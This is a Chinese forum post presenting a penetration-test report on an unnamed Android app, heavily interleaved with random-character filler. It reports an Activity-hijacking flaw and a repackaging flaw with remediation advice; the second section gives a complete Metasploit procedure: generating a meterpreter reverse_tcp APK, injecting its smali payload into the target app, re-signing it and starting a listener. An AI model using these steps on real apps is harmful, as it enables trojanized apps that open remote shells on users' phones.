- h, q: x7 O. o5 B& |* L+ x& p4 q; ^3 Y
, ^$ ^7 d; X) r, T. T 2 o/ r! ^4 v- C6 F8 ?$ T6 d2 P

0 `2 B- |" N# T( C1 Q/ Y$ x! q: K6 I   ' |7 k" `, [9 I' g9 L - b& r) h9 X& O4 D l

8 k- ]1 Y. M+ ]+ b& [. L T: {" f- z) x% ]

8 U& |. @- [7 t4 H8 j+ G! t3 d 3 E1 F8 m" f4 Z- v2 k% }+ c/ c7 V 1-2 测试结果 3 X6 x2 ]8 S1 S4 R % C4 }$ r1 ?) B) w# `: h- `

' J O. t4 ~- x+ }/ L Z ; O& p& q' {) Y( L

2 e5 q: ]4 i4 g. z! z* E7 @7 g/ r . d% R5 v& L, g- f7 U0 R2 w   ) a* L0 S& D; I6 t( E! `2 W( I % L+ v0 [5 J8 V

4 s8 L# {' y' l/ S t) M1 e: ]7 [6 ?. m) w% z

+ k2 a! J L3 e# `' g* Z( p; Z+ A$ R# k 4 f) U' w& x! V7 Q/ N( W 2 检测结果                    + u/ V+ M0 @5 n4 Y! b5 P; D- ~) Q ~ B

5 g3 T' u$ e* y9 \ # ~1 m) k" W: M

9 U" Z/ @2 o$ P* ?* k3 X# } * p: a4 r. S9 j1 x 2.1 某某某 + G- M7 S2 n( a- x3 d z& {8 f: s; ~' S% _

4 U1 _/ J; K6 o$ o! ~6 b1 N1 a # l8 p0 J8 e6 a5 r

: h2 `: T x# x5 g4 _4 E; L$ p: D' _, `4 U; Y6 ` 2.1.1检测目标 , O0 t5 j7 H. Q ' ?- n# e* U# U

; O3 f# r: w+ ^ v1 j( @ 2 N- B+ g2 g6 r+ t

* v% F" O* X$ [% @3 p0 g. Z 6 d1 t! J7 k. g2 i: H 目标地址: 某某某某某某APP 1 j* C0 R6 Y L E & r; f) n$ y- o. C

$ j6 s! _4 {. e7 d$ z6 d6 E, t" R! I% {

/ B" |4 t& m W5 r * |1 \; l3 L2 u. V 2.1.2检测结果 " V e6 P |% l# K9 Y9 r- c( H! B/ Q9 _2 N5 q4 \; c

- r: l& h' k6 y0 P- e, C5 O 2 F: u, r8 z1 f) Q3 y

4 x9 C, I. J0 A K9 H9 a 3 g9 Q/ ]6 z3 u0 X* { 2.1.2.1 1 u& ?: o. g) {6 K/ C! H1 w. ] % w& p6 ~" n3 j: a

K0 z t, I9 d+ |: i! K1 Y4 S6 | n1 _

0 v: V$ V7 @" D ! P( B& t6 p/ o) I% b- _% Z 漏洞链接地址:某某某某某某APP 5 L/ L) Z' }6 n7 S" a 6 k9 ~; G8 |, ~$ W- y, ]8 r+ N

J: o/ Y, ~2 Z6 H1 v, W0 r! I7 s 2 H+ y/ f$ K5 V8 D+ Y* N% Y0 g- n

, P3 F0 A: C7 O% o c 2 E- K1 U& A X- n/ u0 j   * ]# ~) d$ _# Q. ~7 i ; J- N# ~) T; u# x7 r5 {0 P

3 @/ m. `# }6 ^) t) [5 Y% A+ X " c& e4 `5 I/ T

/ |9 O1 Q/ x% }' r+ q* e ' \/ j$ t. m0 V X- h0 F, { 漏洞分析及取证: : B; P! J" `2 q$ l5 s9 t+ C& t4 \# R$ j

( e8 W! ^* U/ p( k2 r) o) v 5 E/ }! h6 t8 [8 o

( y, R, v3 @/ M1 W" S& J* x. s9 O# [% s" k( U: Z6 U2 `2 ^                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 4 E1 T7 B8 P* E9 l M+ M # T$ ], ~" V( d# x

7 x6 _8 n7 `" O d }2 f: W5 W6 A- v& G) o1 z9 N @

% v2 F- w8 E8 H* u/ F9 E! F# _3 G% b& \+ x& z4 J      & q7 ]$ S) u; n. X$ m / t& \1 A) u/ A/ c J t# f

3 w- t8 G9 x6 e2 E( ~; n8 Z / P* J- }. l$ i, z$ T1 T

' d# e6 H7 W" i0 e8 e1 c/ I " Z$ u7 p6 [) k+ L S                       ! r8 z P3 j9 N5 r) l , E' d$ z8 }$ `0 s0 N

- p7 a% [! R1 \0 X E3 J! Q % ^7 D5 z% J1 b- l' L" A0 e

; r5 U2 t6 b! q0 s 9 I# M3 z7 P3 i2 r2 W & z0 M# {4 D9 w: l $ P3 J U( F" n5 I8 G L0 S6 `

$ p) A( h X9 V; K/ w; ^6 N5 x' Z' n+ t; n7 O [* y1 ^2 F/ D

: P, p. {6 E/ h- K: [' p% p# W1 I' z8 r6 H5 j . K: E6 e1 w$ ?; O9 q( o0 Q % L$ x. h: q' ]. m+ B+ S

- c3 e6 Z; P1 g4 z; \ . R9 {- M4 l1 y% C

9 m% Y; H& {9 e4 m $ I ?) g E; W4 `' X' H % z" M3 Z9 |( G4 _# o * Y- i1 n; o. w# `) K' n+ q5 e- i# N$ q

; r5 x4 K8 J+ e# J ; i# e$ ?7 G/ n" Y

! W- d5 h* d7 [" N ; e5 O! W! r0 `* c7 C 漏洞危害:高 ! x$ V$ W1 n# Q" ~# O4 W' \0 m , {' k" J9 R7 z- p9 a. ^& @7 S" k! R

$ {4 q) ]3 o1 W- d* a9 k( R1 ] ) i2 X' \6 D# S6 T
/ ?6 h# A- K- D0 g , Y* h/ z0 F; M1 c! F 1 f; {) Y. t: K( [3 M. z6 X3 W1 Z1 B* `3 j& \) t: L+ `9 e' `3 c9 p2 {% _) y, B" X4 O9 y3 t2 A) }9 ?% T1 k; G% A# _3 X- Q g+ ]3 p/ ^3 E6 ?2 h4 [0 W' x4 } U- e C# n p9 _# A' c$ |% @7 R: U. ~% p, a$ U) b y# L+ ^, z+ A% b, h, L i8 V# J1 l4 A* a9 D$ \! W9 U* J- Q2 W4 b) l' F7 B7 N. @1 b, R3 T) { K3 v3 ]$ c( z" t/ O m4 K; a1 L. F2 N: m, a' S4 I# a, w% Z: i$ G- f0 ~4 W4 K5 N1 m4 z& u# U2 e, H! {& V" x3 e6 z! g: y/ B% C* ~7 e3 M2 r' S0 d V; B# s- L" a9 u8 _1 Y& |# J0 o# g* Z* _' A0 F/ l& r" {4 @+ g; {1 C# g# i" `0 j+ E. \; O- V$ I) K4 F7 m% p
3 x ^% v: _5 U% S# e 5 d( t5 z3 D( b9 x7 s

1 h3 q' w$ J3 ^9 w1 U/ q0 ~2 z& Q6 m1 j 严重程度 / X: K0 v0 y9 c$ q3 M r, d# B* I. E8 M }: d; t$ l; A" J- @

+ A% f5 t& B3 a, W: J6 S2 r* D |# b * |$ O2 B, B' N% g e/ @3 s; g; ^ 		7 q) h# d6 t/ w( z& ` Z, L/ C& D$ W

; H+ R4 A/ }7 K( n/ j + ?( j+ E n: _( s- C7 v ( o# {% B' l2 S D _* R + m9 i$ J, l A: ~- P

. J. z. y9 G& O8 G! n# y 4 x" Q5 ^+ w5 V+ i3 r3 M; n, v7 @ 		" s' {6 ` |, }# ]' F) I 5 P6 i$ D* Z3 Y; i

' v1 h9 \: B# J+ B * O$ a# s+ w. I. f9 r6 J+ d 0 f( q+ O6 f! W$ w9 G [$ Z/ N$ i

8 D/ ~' P. N7 O( X. \3 c: ` & Q8 _* e0 o( H Q9 A" x4 N 		8 u7 Y2 ]/ \8 f9 F 5 @" S) K8 u6 g$ x* W4 w

8 P' ^( E0 K. h1 ~3 f4 |0 p" d ) ]9 n5 O6 `5 U. t2 E5 p- J. c ) o& D/ M0 A U+ L" Z / d* h5 Q4 x: p! \" J+ e: I

) [# \0 L0 R; T# D2 Z- Z % C( Y3 Q2 n% y0 S2 ] 		. ^. k# s, k' S3 y/ H- ^# n 2 d5 d# X8 j8 o

$ q+ ^' i+ f% U/ R# G% v 8 k% R; Y, j6 d. Q' B* N   % i5 a' O( J9 h" a- T* p, ? % d4 S w' C3 k( I( N! P

4 v* J, m3 N6 q; v/ v2 w ) K& g7 J8 K; W" B 		' p: J% t1 l& w* L0 \% {; P3 B9 x( n; |( c6 F0 n9 w2 _

% j/ u% a7 t& T, C5 e- s! \4 R. y( U" t' n" b B7 N 2 m* {! g" n) ]% l2 T" L ' b2 v9 r { t5 S% C8 G2 T; U% _

' k) L# D9 N5 U) b " x7 ~: q1 o# z0 u1 r6 N 		5 ]! F% F& S1 s* n* U& B & F# g2 j! {; K( d I2 A

* | s) J+ M, J! O: E, B: w% c7 {$ v$ i# Y   9 S! n# B9 Z! ^ |* @# y2 c5 ?! x' W/ b" d5 d2 e: w

- `7 j5 S; a1 v! O7 W' R * b- N7 g/ S' V* L! Y: \. j1 e) s
$ R0 `- b. U m* O! b! I F1 E# \, ^' O6 i- }: j
* B% { \9 G' u! `9 W5 q3 x # ?- o; Y' f3 W* w$ j

! d% d7 E/ \' W) Y- T1 J& M. t+ k4 d8 w" }$ D   * m% h: B+ p6 \ 8 ]: {. k. e4 ^; ?& F

3 r: s# W/ n$ _3 k5 {4 n |- x, q+ [& w& j. F1 x u! X

: V1 {$ a/ R5 g9 D/ y0 {/ b& [# [! b, [: m/ h8 v) w 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ; Q0 q0 t/ R8 u) Y8 D , M0 r% S8 T8 y' i7 c) S# C

/ K' t* p$ ]1 K' t! `( M \& f7 F( v4 H+ V

* h8 G4 ]* \, [ / i" q- {$ M' ~/ j1 W           0 M2 |2 D+ I$ V% Y # x* `; x7 H- C; r( f; B

+ N2 ~: @( Y! t; m) f* q; V! S7 d7 V( {

+ M* W3 s; ] E7 g % k9 i7 |1 }5 _, M   ! n: A( ^ y4 p/ ^; I9 S |8 H5 C! A: | o" T3 r: e# P+ a

, }% S5 x; l$ A# t ( K9 o; e4 Y) W$ ]3 G1 f

! G. Q, B9 d7 j- p/ d3 K4 p# V+ T& n9 P& k ^ 2.1.2.2 & _$ @. X' ~% z0 @* {3 | 3 C7 x" R8 R0 C# ~4 n+ c

8 L- y# T; f, E1 U* q9 d% n' t5 e & s+ ]9 @9 V% V! L. w, Q

. [: I/ s! o# e$ n4 L * x7 A. S' l# z$ I/ r! Z; H! ` 漏洞链接地址:某某某某某某APP 5 S& D& l- @6 p4 a; o F( g 3 S; r0 E; G$ D. v- P) D- b8 F

+ L6 N5 b ~( \- Z* S" q4 v * }3 |) E" @5 ^. g% o

0 h: r: v" o* s8 j+ u# |6 v3 V: f" S/ ? 漏洞分析及取证: : `" |- ?) P7 z$ C - N3 L+ H! O* S, v9 Y) }

6 l# O: l' Z0 j/ a" _! U. f5 j# Q 6 B8 ?2 @' r, l) H# U

+ d9 c8 \+ _4 z& i. z. } ; G4 e2 b+ q" s8 N% u                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: # M6 V# K3 a" I4 t& \ * u: R* h7 h }3 c4 p0 a, t( }2 X

+ Z. C, J- M* E3 K4 q- X2 n% L6 v/ [( @# X3 ?

4 v6 G1 S$ o) Z( a! I- S2 _5 n. ^ , A6 ?+ {2 p h% Q |7 F1 C7 Q2 | Metasploit 生成木马 apk ^4 p' Q# ?6 b: P8 L- i: \1 J 7 u0 a' G1 x6 h3 m" ~

: P0 j9 G& r; e1 r & H& V9 h" r$ v* X0 d

8 k& L- w: Z' M 1 A, o7 g" K! D2 m1 w7 Y7 Y msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk $ \% Y0 a) `( X o9 ^3 S . q/ [+ h) B/ @8 u. W$ ]; Y# g8 w

/ T$ c8 {# o; r6 s) w' L0 _" M 5 u$ L( }, \& n# b1 P% C3 B

, \: ^7 x2 U$ Y0 A r( K- t3 q) F @ 9 G& k8 _, x% t+ e; S 反编译目标apk和木马apk - f8 e2 F: G4 x, m9 {$ F1 }) B* S. Q0 {

! T1 e7 |, F" P. S) \' b# e; n 0 x3 c. \$ C1 p1 m( ~" N5 v% K

0 J- |& H# ~& s 0 _8 r5 _* U; V6 D" o3 t apktool d target.apk
2 N# w* S8 @4 b! t! Y s $ \- H. a$ r9 a. C) q6 E apktool d cockhorse.apk y9 q P/ @# O/ s6 } 3 G* V5 L( {( {& i

+ Y* O" u- ~" [# e7 o& x3 j: y ! x( S# Y' X0 l6 K6 F: B

4 w) C) O u* A" ? ! W6 m6 H3 G' z9 h 木马 apk 注入目标 apk ) i" v+ F* R4 ~/ y : g, s/ U% g6 t4 W% w+ f

$ N7 a% H \+ c# {2 N! [+ g ; g) w; g7 o0 {* X8 q: l

) F1 Y" R# l+ R2 I ( t X0 q, i5 l. b8 {5 z 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
+ A j. \7 U, A# `: N* k 2 j E6 j7 i- R3 {+ i( {3 [( z$ { invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ( R9 X. Y9 q ~& c5 R/ F3 G : z9 i3 W9 S4 K. Z( I% O# r& Z

3 ]* b Z1 Z/ ^* M ) ]) q& _# x. d- q+ m }

- s# l( _5 B2 ]: H! M ]2 g' _6 H% `# a 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 9 r, Q4 N8 S2 H& {8 u Z : H+ \+ u ]# G3 }8 u5 c

& V5 W g' }3 t4 g" C+ |' Y# ?" S+ a( J. ?! w8 m# W

% h) e4 k2 C a/ B9 ]9 B- U$ Q' ]6 q; N# H/ W% a 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ + P! [& B% q$ w: a1 H- V $ Q/ l7 f) a6 E- @1 f0 m! ^0 ^

. O5 Z6 W6 k- z. B0 w( k6 O; {! K+ G

% o+ C( |& M/ v & `3 V5 @' Y4 c/ D 回编译生成最终 apk . U+ o& D+ n$ j8 I& p3 Y, K2 U1 U+ s0 M- S: U P

2 _; x" Y: c: c 5 _. X, i+ ^6 {- L( p

[. P/ n7 @" h5 L y8 y+ h ; ~, b" k- U( }9 B: c 重新打包 6 D$ `/ v M4 S % n! l3 i. |8 ^

/ @( H- d. e2 u. h6 L" O+ W2 Z" \! F B% d3 H. K* J. r" Q

8 F% U- A. c4 I0 }7 Z" j: T+ R% R1 ~% O4 }8 ^ apktool b -o repackage.apk target_app_floder 0 n9 b! ^1 [# c3 c1 k J. v, T2 c+ t, W% a8 @

6 N, L/ u' \' K% r$ e 0 E3 V( x. I- \, O# Y' n) @3 g

9 t6 ?5 s+ U! q/ K" V, N- z! m1 {% t @9 M1 I$ r ]. Q 创建签名文件,有的话可忽略此步骤 7 j. o, A, F0 b% B ?! S$ v' ]* m, f) ~' ^7 t4 u3 R

% F. \/ C: F/ f' \( |" ]/ e; b0 X9 N: i( f# ^; @

3 E# ?, b, B: D, Y4 [' f6 h/ k+ f1 ^3 E- q; S keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ! r/ v* W& _3 |# a+ I 0 z$ C H5 z" X

& b* N6 |0 y9 ]6 e9 a, k* Z" h6 `

( n. w+ ], R( K; z4 } ( J- V* O8 H$ P w" l( k 签名,以下任选其一 $ f0 c @ m% h; k 5 J* q0 ]: h& m

G0 b0 f) [3 e |, b# {# t$ X0 o& t0 ]6 }

6 e2 _+ \# I) T- n$ N c, R% ~# D' n 3 T' E5 i. f$ @, R# A jarsigner 方式 6 I* ^1 n" O6 P& ? u+ r% T+ l8 z6 K. i& g' o o. u$ ]

" v- o# ^# u6 x% f; g5 b5 y8 e" F, P8 c

; L# z P6 ^1 E+ z8 x 9 F1 q* I, P5 X% [5 B jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname " s- M( x: r# W$ Q5 ?4 C 0 y/ Q3 L( F6 i& n1 }

0 x3 H' u& l7 m q! Z" q" R& ?; {2 C% u- d6 [! t

5 J2 a% X" s1 R- M5 Q3 v 1 i1 h/ Z p6 w- v) V, \- v" ~ apksigner 方式 + W# }' v8 c3 j6 M/ E ( E; v; d4 u( K, A

1 Y2 N- e3 y- u5 z0 d5 S % U9 Q4 Q3 S% k, x+ I' }: N

3 h1 }( l' L- I, S * n* _- o) Q7 `* U apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 2 g7 E6 n& c+ C# Y 1 ?# B+ d. }0 a9 e/ ?8 ~0 |4 A6 p

7 S: E. C6 M: F+ b3 g I8 Y6 k9 O1 h9 ?! X& h2 ]

* K" ^7 \ O# u8 H, o/ t 6 i" p C4 C; M 如需要禁用 v2签名 添加选项--v2-signing-enabled false ) a; S, f$ @+ B' ^& f 1 {7 g, a2 ^! J: _: \* g" Y

2 a5 @, E5 g. ~, d) ?% @- x) U- t" w) d9 Q3 T' M

, [8 @3 E. d2 B; q, C - f$ T5 T! X: X: ] Z" a2 y$ W 验证,以下任选其一 ( Z: q! d% }1 x* H2 f/ B - {) ?+ @3 }$ {+ V( P- Z6 `0 U

1 m6 O3 ^) H9 t* I* d# A0 C- {! w$ i2 X. \

* U$ P+ Y5 y: B" n7 r " K; |) M- s- D( h4 J jarsigner方式 ! @# b0 |) N; M- k " S( \# H% _6 @6 P5 j3 ~

+ j I7 k+ x: ~1 R1 a ) N0 e& R/ i2 _

/ H# X; ~4 p6 I9 }7 b }- h* Z% o% [# J 3 j7 E. [1 ~* p/ F! ? jarsigner -verify repackaged.apk 7 S0 E. Q: T# d# P 8 E* b2 p, G+ p+ W4 d; e$ }0 S

; ?4 v3 K+ j8 `/ ~9 t ; s% V1 V/ a5 K$ U

) @9 K) s0 j) t1 W! {' d! `9 i! C / o1 [' [. X1 C. G apksigner 方式 : D; t3 h6 |4 S) L8 C% U$ Q$ @% T9 n2 e& C+ _# _, k

, ?/ G3 F8 w d 4 O, F/ {; x8 R/ j

4 M% ^' q. N' h1 X ( i/ X! A+ U) Z apksigner verify -v --print-certs repackaged.apk 0 q" S* W+ u S + _" m) F% Z, Z

K6 b2 x) n @7 @0 o( l0 t + C8 _. S8 R: L3 s) l1 n

) ]6 r9 w9 C! A8 _$ e ) x. G& `6 J& h6 x* N1 t keytool方式 & s1 I8 k2 T& }' J: Z' q' N* R3 g( ]; m& v. P5 J

8 |2 s, \( [* M* Z3 r: \3 W, ?( \6 U7 {! d2 t

" S# p0 I5 L: t3 P+ `, W; z - z! g) g% v$ [ keytool -printcert -jarfile repackaged.apk ) d5 }% U) c ?/ S. q; K 7 p: C: ]6 F0 @5 N' I7 f2 j

8 Y; \( d4 Y0 ^# L9 n( Z, A/ \$ |' T

! i( c4 d' E6 Q8 ]9 g4 @6 P) Y0 j 对齐 . S8 {7 J z) _& K/ s2 ? / t& G/ M% X& m# Z7 V: V" l

8 g. `# x9 b& F9 {! O 7 i) P& a8 d* e" f

2 T$ @ d( d0 ^# \! P4 C9 g2 \ ' B) u5 T* Q- R. ]0 Y w5 }/ I 字节对齐优化 9 U! L5 N9 b4 t% |+ X9 b' F6 N & W1 q D' Z( p& |

' k! [+ y! P3 y: u2 |3 t$ ` 2 _: N; r e; p

7 F* F. G3 a+ K, p ; E0 n- ]7 E# [) y zipalign -v 4 repackaged.apk final.apk ; ~- r# |( b. Q) ^ . P. h& T, L: W8 T3 |

$ ^# _* d4 r# u" t" ]6 n8 P v8 b$ q3 k3 e9 q: m2 u

; k5 k0 ?0 D- p, J# n- M, n" }% J" n# T' k. X1 S- z2 a) W 检查是否对齐 5 S7 A) C* Z9 _4 n! i \ 8 w. j4 Y* s9 S$ ^/ k5 Z

) j) j; h' p/ t$ g. t + a/ c0 o7 n, Y( _; ]

1 `& K: b2 g* c) T; T % q4 T3 N; s" C% J/ r5 g3 g( c* p& R6 M zipalign -c -v 4 final.apk / q$ E6 @% {& t1 m4 [( F. z( P1 f7 A! u# z r; J, }0 ^6 N4 W

9 U0 T* Y2 {0 L4 m9 e m* ~4 W7 x4 G( _$ T8 f

7 v1 S3 C, C- ?% ^% u , A& I, |) E; o5 r. u3 s 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 6 q; l2 V1 ]1 R + Q8 y5 Y3 t' G; V

' d4 J+ r' w) y0 M& v5 ?% E1 D& N9 A$ k6 T! o3 j

- c7 v: p3 X& H, s6 G3 x , p: W! v( C: F9 t6 a 启动Metasploit控制台,配置参数等待上线 ; ]( p7 y( s( d2 F, m8 u1 R 5 x( T& _4 r% [& u! q0 x3 l, m

5 m9 E K8 q% a: e( `; _# q5 \$ o, a/ _$ h1 \8 U, K( o

& H7 i" K8 A9 I. X/ t3 b# i 8 p$ J+ W/ U5 k0 F7 T3 I 在终端依次输入如下命令 6 n* j1 a; |& W8 F$ B9 ^+ \) d% K0 S* {/ l; E( |

+ W: Y, A1 n3 H " @# ^$ ^: k$ e- F$ e4 @

4 j. H% n W; [, h7 n& `1 k& d k2 j ! [0 e' v! X0 ]# _ {7 X3 m7 C msfconsole . O3 ^$ J0 n( P. j ! r2 F8 \# r! c0 x: M# ~1 x

( U4 }* J. d J) i: ?; t2 w. R" o 7 G1 l3 m/ G1 p0 P7 h) v" C

/ L% Q. m# c- ~8 A% S8 x! `! K! e; T" k use exploit/multi/handler 7 `# Y( ^( ]# T$ C + B8 t( V. c f# |

& P/ L! |; z l1 i; {7 _0 Y) [$ | m7 V! V

" ^/ x8 z& a0 `8 [7 m8 L9 x: f0 T" m8 b. }* B/ k0 C d set PAYLOAD android/meterpreter/reverse_tcp ; W; H. k0 w$ D% R# t& y % m7 c. j# O+ W- r% o

9 b2 M" e3 E4 T9 c / I( y7 C1 F4 k& r

O% m" S `( r( K* t( n/ e & i' p2 ^8 W" i9 A7 a; w set LHOST 192.xxx.xx.xx 9 A: z" z% t% s6 m8 R, T9 @' O9 g. | ( }" z) N9 K5 P$ Z. `

2 l2 I8 C+ i3 Q4 e9 U' b8 l) z T( W( m) e0 d5 C

6 J: j7 N% b6 z; {# S3 S8 R0 u# C6 {" ~ @+ [$ `, y1 \5 b, [ set LPORT 4444 ( g* ?4 M H5 u5 B4 E $ t% d9 g' V2 E

" @/ B; m% T( M$ E3 L7 ~) E* R9 m$ }" G2 l* C1 O! H

7 `/ w% Z& |! m7 ~- o* C 2 q* T8 o9 c* `0 P, O& b% [ exploit 9 O) n# ^2 n" b; D # o4 a# h! m+ N

4 {# p7 f, u; O% H0 F, N# @, n8 n5 N; B+ @& S$ Q. I4 B

. ]# P: I8 P) {: }( ~0 j( m2 K, p5 S1 Q+ e 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               : O4 {2 S# c J5 K9 W0 O# _; h ) B5 _* A. D, Z9 G9 m: C- [

$ g4 e( P7 y+ [9 V' I0 ^ 1 U: ?# P( c9 h6 o6 k D; h8 m, t

- ^1 q+ q7 d0 M8 c: W8 {1 i2 Q# i ! X& G" }+ s5 V% A6 W8 J 漏洞危害:中 $ v/ A) Y# L$ @" C% l: B 4 K3 Y5 [$ F2 A- J: }! p

; Z. t. z8 { W* ^( M + W) l( ^4 c4 Q/ \4 w
& U+ b2 ^9 ^0 S& v2 j; n$ i, ?3 ~6 d N8 x6 C. @/ ^ 2 K& @' J/ x+ a$ j" @- i' i8 I# C; A" T' o' ] 8 r/ c! j0 m, e( _$ n6 w" n$ X! Z. Q4 X; K1 M* F$ V; M. C5 x6 c( o. t y+ F4 B2 a4 w* Z( [0 p) @: l6 g- Q* s% [7 Z9 @% Q2 J. W' `7 u1 h% n) i- D3 n% f! d" s- J# u/ n" K1 g# i, }" l5 B% D" L# W: X0 a& h: i8 F: P) B* h; Z; r; S B5 q- P5 b7 b$ N# Y# l$ F4 P* H( l0 y( d N& _& s0 C- N- g* x9 T5 _: j5 E* P' y c8 d A% f5 t4 j9 v" t. N2 i) g) U( [3 N) ~* I1 o) e5 n0 y" z) d. T L! k$ d' b4 j0 g& j1 b- t; A4 B( X, @4 T# n4 h! A: u, |( Y- m9 d \$ D' q; K2 t( F& J0 H7 C# p5 i" u/ r4 P8 h2 U. O. `8 L. F, {# v- o1 U5 z5 i% g' l7 u% F- a8 I: T$ \* R2 L4 {1 C2 z9 i
5 N: y& w7 \+ V2 t+ I/ P 3 ?& Y$ h! Z. `2 p

1 \6 a0 ]2 e* d& m5 ^6 ^! Z0 c% |8 t* [8 G- e 严重程度 * ?6 g" ]* s! {2 I$ L4 Z / B( p( n4 {; G# @, y8 z

9 _. v3 c" x# t5 a6 g/ } G* H5 V. E; I& w 		% B* q1 Q' ?; s: X - P- t# `0 i+ x5 L4 f/ M- ^

% m- A3 Z- N4 b; g1 b9 f% ` ! N2 k5 H# O6 L$ Z& s# z 1 L" [+ t2 l B7 v% U. c2 t % \. x$ h% Q, y3 K

! T) w( o8 N) U* E5 @2 ~ 7 _5 v7 X- F5 o' A/ l/ h 		5 i) u7 X6 q* f! O. F. _7 D$ h6 X ! _2 @2 N5 m7 X5 k

; Z7 [! G" u( o, E6 E4 L' o- ^ 3 }6 M) t* l8 C+ [3 R % d5 r6 G6 G/ b( Z $ b8 \4 S. h! N1 }. C

: p: @8 k) ~* S5 t, f) W5 t' j J- S8 ? 4 r( L, e8 m* N. F. n2 K6 S. E 		+ f' u/ O+ w2 r e* }* J ' E! a# o; E2 d5 w7 N

8 f. w" ^& U0 w) V/ d' T4 ], _ ' Z t4 c% G2 T" c$ m+ K( F ) P9 _! {/ C: g( q8 v0 c + e2 S$ P& [0 Q% t. G" c0 R" x

9 _4 s6 S' c8 k9 J8 T# h$ T ; q8 [& b/ a4 D5 G; \! b/ y6 l1 u 		8 V Z- Q2 N& U) a9 r W, x; h7 n5 E* N1 c4 s" N x 6 J5 P& T2 i% D6 m! | ( p* O6 {5 b: v

/ a4 _ r3 j; t2 s- d 1 d+ |/ s: v4 \) h   $ w# t0 J4 k+ K& S & b; q k5 y. ~( j: k2 h

8 N1 M: V1 r( x" \$ _2 n3 G( J; ^9 q# J' ]* [7 x 		, F8 h" @5 ^% j& f2 |& q: g1 s) o

- t+ I' t+ x$ b5 c/ U K* w0 K8 T - j5 s" f# n- o8 `# @! ^) E: h * ?/ Y5 C) }& F H - {/ L7 P- j) J+ a

& a' ]6 _1 I, w i9 Z0 g 7 t9 }! T8 z7 W1 [) c# R5 W T 		1 \$ C$ R L+ N9 T6 R $ k4 y' B! H! n3 N 8 P; c3 p0 E, T. | 0 o8 ?& |' y& G U2 C- o

( R8 e3 B0 X* W7 o) `% ], ?2 D! b; w3 D d. p" Q1 O. S   - n0 t) H2 V, }0 k # C" k/ H+ d* z+ g1 b+ m& O/ ^

: f0 w9 ]0 o) ^9 ?( Y# q% W9 e 0 L! Y* \. E1 m
9 a! R2 G4 U8 U) w6 w- A, B* C$ e' p% s, O* D
& |5 F5 ?: k2 I' j9 G0 B( J6 @# W" o J N7 u% V6 X3 }' S! S5 k

% s& k$ @" C& h 0 P+ K, t+ V2 P   ! M$ O' r, h; s$ ]8 p# @' | 3 i4 o4 f# N9 C& U0 h5 n5 D, b" T

Q& c) C) t7 k* | D0 l: H6 `; g1 c/ T+ ]4 B3 O* p' a

* _5 h( w7 X7 S5 h ; E- o( ?' O O: k( r6 c. A 修复方法: . ]. t1 P5 P/ x6 z9 F) M b- h3 o4 G" K6 G3 C0 { v# z

8 S7 p, W1 u5 _" N) h $ M7 d1 Y/ l$ U, O

: h0 r/ q" e4 o2 `2 i 4 T" D( l. S* C               1. APP 启动时应做签名校验防止二次打包。
( N% U5 Y( g5 H% w + M4 S3 Z" \& @" A* o 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ( A1 ~1 P& U2 f5 Z' }7 w: T: V! D. H0 f% Z# Z7 M

8 W0 P9 Y; |" @0 R * o6 f4 a& W3 T 7 {' _: h# k! G: ]/ J; P) Y ) p$ e- p; o) |. P( M# J

$ R. x! ~0 |$ e2 x/ R7 Z8 y2 |) i, D3 P% X& m" f4 i1 y) j' ` e* B   $ `: F; e: X6 e ! _# y/ d/ p1 z0 y- {

1 v% L- O, h4 a9 i1 ^3 f & L ^ v. c& N, i0 x5 e) X9 ]4 X 1 g+ o5 F1 I, M! A" p+ ? # f' h6 g0 |/ |: i! ~9 o

3 i0 E' J1 x' u. T2 Z7 q3 q ) j) D+ a0 i" r h, j
( Y# S% L, C, k0 N& ^' E & U8 w# q. q* y6 I3 {6 D$ W

v) N* R: B8 x0 e \/ P+ L* d. |, w& c# ~& F5 t4 W" p$ f
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表